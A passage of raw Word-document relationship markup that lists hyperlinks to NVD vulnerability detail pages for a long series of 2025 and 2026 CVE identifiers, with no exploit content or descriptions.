Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId1489" /><Relationship 